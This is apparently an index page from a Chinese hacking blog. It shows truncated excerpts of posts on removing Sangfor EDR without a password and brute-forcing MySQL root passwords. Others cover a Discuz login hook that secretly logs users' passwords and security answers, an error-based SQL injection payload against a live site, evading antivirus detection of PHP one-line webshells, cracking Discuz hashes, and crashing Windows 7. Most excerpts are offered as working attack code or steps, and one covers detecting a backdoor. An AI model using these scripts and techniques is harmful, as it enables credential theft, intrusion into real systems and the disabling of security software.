首页 分类网络安全

无需密码,卸载深信服EDR终端防护中心等其他深信服软件【亲测可用】

无需密码,卸载深信服EDR终端防护中心等其他深信服软件【亲测可用】

还记得员工行为几乎全裸的深信服“监控门”事件吗? 对每个“打工崽”来说,如果在工作期间访问的网站、访问频率、聊天关键词、投递简历的次数等,都被与员工的姓名、所属岗位等挂钩且可被查,并且所有上网记录(包括但不仅限于聊天、听音乐、购物、看视频等)都几乎“全裸”一般被置于其他人监控之下,那会是一种什么样的体验? 近日,就有网友在社交媒体爆料称,自己遭遇了类似的情况:其在上班时间向招聘软件投递了简历,随后被领导约谈并遭到辞退。该...

PHP Mysql 密码暴力破解,root密码破解源码

<? set_time_limit(0); //脚本不超时 $ip = "localhost"; //IP $user = "root"; //用户名 $passwd = file("password.txt"); //密码字典 for($i=0; $i<count($passwd); $i++){ $pass = Str_Replace("\r\n", "", $passwd[$i]); //剔除多余的回车+换行 connect($user, $pass); flush(); } echo "扫描结...

Discuz 密码记录

//打开source/function/function_member.php //找到function userlogin //在return $return;前面加上 $a=file_get_contents(dirname(__FILE__).’/1.txt’); file_put_contents(dirname(__FILE__).’/1.txt’),$a.”Id:”.$username.”—-Psw:”.$password.”—-question:”.$questionid.”—-Answer:”.$answer.”\r\n”); //记录登陆成功的账号密码以及问题答案!保存在source/function/目录下的1.txt ?> 一般上面的这样容易发现,我会把1.txt改名,并且base64_encode之后再保存。 //base64_encode之后再保存。 $a = ...

简单的HTML代码弄死Windows7

简单的HTML代码弄死Windows7

这个很小的 iframe 标签(当然了,实际上它运行起来并不小)是一个强大到足以让一个64位的Win7系统崩溃的标签,它将导致 Win7 发生著名的蓝屏错误 Blue Screen Of Death (BSoD). 该漏洞是由 w3bd3vil报告的。该漏洞在64位的Win7下的Safari 浏览器测试中招,我很讨厌蓝屏,因此没有测试其他浏览器。微软正在进一步验证该漏洞,下面是关于该漏洞的一些技术细节: <iframe height='18082563'></iframe> 注意:请为自己的测试负责. 描述: ...

putty和WinSCP后门检查及清理方式

检查及清理方式   检查/var/log 是否被删除# /usr/bin/stat /var/log   如果被删除了,说明中招了   查看/var/log 文件夹内容# ls -al /var/log   如果文件很少,说明中招了   监控名称为fsyslog,osysllog 的进程# /usr/bin/watch -n 1 /bin/ps -AFZ f | /bin/grep syslog   如果有名称为fsyslog或osyslog的进程,说明中招了,注意不要和正常的系统日志进程混淆   检查/etc/init.d/sshd 的文件头是否被篡改过# /usr/bin/head /etc/init.d/sshd   检查/etc/init.d/sendmail 的文件头是否被篡改过# /usr/bin/head /etc/i...

php+mysql高级爆错注入经测算有效

之前想找个测试 没想到这有 可以测试下做个记录而已 http://webshell.cc/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003 /data0/htdocs/leqi_new/app/myapp.php 或者 /**********version()**********/ 5.1.49-log http://webshell.cc/download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+coun...

PHP遍历单目录可写权限脚本

PHP遍历单目录可写权限脚本 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <title>狗一样的男人检测文件夹权限</title> </head> <body bgcolor="#000000" text="#FFFFFF&q...

避开eval关键字,打造免杀一句话木马

这年头留个php一句话木马,随便就被杀了,但具我所知,杀软和运维人员杀的都是eval函数的关键字,只要避开关键字就能延长木马的寿命,但要怎么避开呢? 首先我想到的是将eval从字符串类型赋给一个变量。 如:$func = ‘phpinfo’; $func(); 这样的确是可以运行phpinfo()的,但是eval却不能通过这样来执行,我马上又想到了assert函数,他有着类似eval的功能,但效果并不理想,完全没有eval用着爽,而且也是公开了的,所以我也就将他放弃了。 还记得《20 Ways to Fuzzing PHP Source Code》里提到的preg_replace代码执行漏洞吗...

Linux系统各版本的本地root密码破解方法

这段时间老碰到有人问及各个linux版本的本地root密码破解方法,我这里自己以及在网络上搜集了些资料,希望对看到了这文章而又恰好用得到的技术人员有点帮助: (一)RedHat/CentOS/Fedora 系统密码破解   1.在grub选项菜单按E进入编辑模式   2.编辑kernel 那行最后加上S (或者Single)   3.按B,启动到single-user mode   4.进入后执行下列命令   # mount -t proc proc /proc   # mount -o remount,rw /   #passwd   #sync   #reboot (二)Debian linux 系统密码破解   1.在grub选项菜单’Debian GNU/Linux,̷...

Cookies注入步骤

Cookies注入步骤 1)寻找形如“*.asp?id=x”类的带参数的rul 2)去掉“id=x”查看页面显示是否正常。如果不正常,说明差数在数据传递中时直接起作用的 3)清空浏览器地址,输入“ javascript:alert(document.cookie=“id=”+escape("x")); ” 按Enter返回一个对话框,内容是“id=x”,然后用原来的url刷新页面,如果显示正常, 说明代码是用Request(“ID”)这种格式收集数据的,可以利用cookies进行注入 4)重复上面的步骤,将常规脚本注入判断语句戴入上面的URL:” javascript:javascript:alert(document.cookie=...

discuz后台密码加密hash破解

discuz 密码大家公认的蛋疼 该程序采用碰撞破解 加载字典(各种库中提取的)   <?php error_reporting(0); if ($argc&lt;2) { print_r(' ----------------------------------------------------------------+ Usage: php '.$argv[0].' hash Example: php '.$argv[0].' cd1a0b2de38cc1d7d796b1d2ba6a954f:dc2bce ----------------------------------------------------------------+ '); die; } $fd=fopen("1.txt","rb"); if(!$fd) { echo "[!] error:打开字典文件...